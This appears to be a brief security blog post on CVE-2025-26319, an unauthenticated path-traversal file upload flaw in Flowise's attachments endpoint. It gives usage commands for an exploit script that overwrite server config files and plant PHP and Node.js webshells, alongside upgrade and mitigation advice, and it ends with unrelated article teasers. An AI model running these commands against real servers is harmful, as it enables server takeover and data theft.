CVE-2025-26319 is a critical vulnerability affecting FlowiseAI Flowise versions up to and including 2.2.6.
This vulnerability allows attackers to perform arbitrary file uploads, potentially leading to remote code execution, server compromise, and unauthorized access to sensitive data.
/api/v1/attachments endpoint, which lacks proper validation of user-supplied parameters.flowise_exploit.pypython flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txtpython flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.jsonpython flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.phppython flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.jsThe attack exploits the /api/v1/attachments route, which is accessible without authentication. By manipulating the chatId parameter, attackers can perform path traversal (../../../) to upload arbitrary files to any location on the server’s file system.
To mitigate this vulnerability, users should upgrade FlowiseAI Flowise to version 2.2.7 or later.
Additional measures include restricting file uploads, implementing strict file type and size filtering, using allowlists for permitted file extensions, and configuring web application firewall (WAF) rules.
Learning Without Walls Remote education has long been a lifeline for students in rural areas…
Have you ever come across a picture on the internet and wondered where it came…
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…